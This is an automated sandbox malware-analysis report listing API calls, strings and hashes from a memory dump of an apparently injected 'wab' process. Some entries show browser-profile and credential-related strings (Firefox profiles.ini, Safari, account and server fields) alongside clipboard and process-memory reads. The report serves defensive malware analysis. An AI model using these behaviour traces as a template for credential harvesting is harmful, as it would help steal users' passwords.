                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true


                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406942

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042BFC0

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2565263379-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2014503067-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7756DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                    • API String ID: 403622227-2664311388
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                    • API String ID: 577499730-1134094380
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
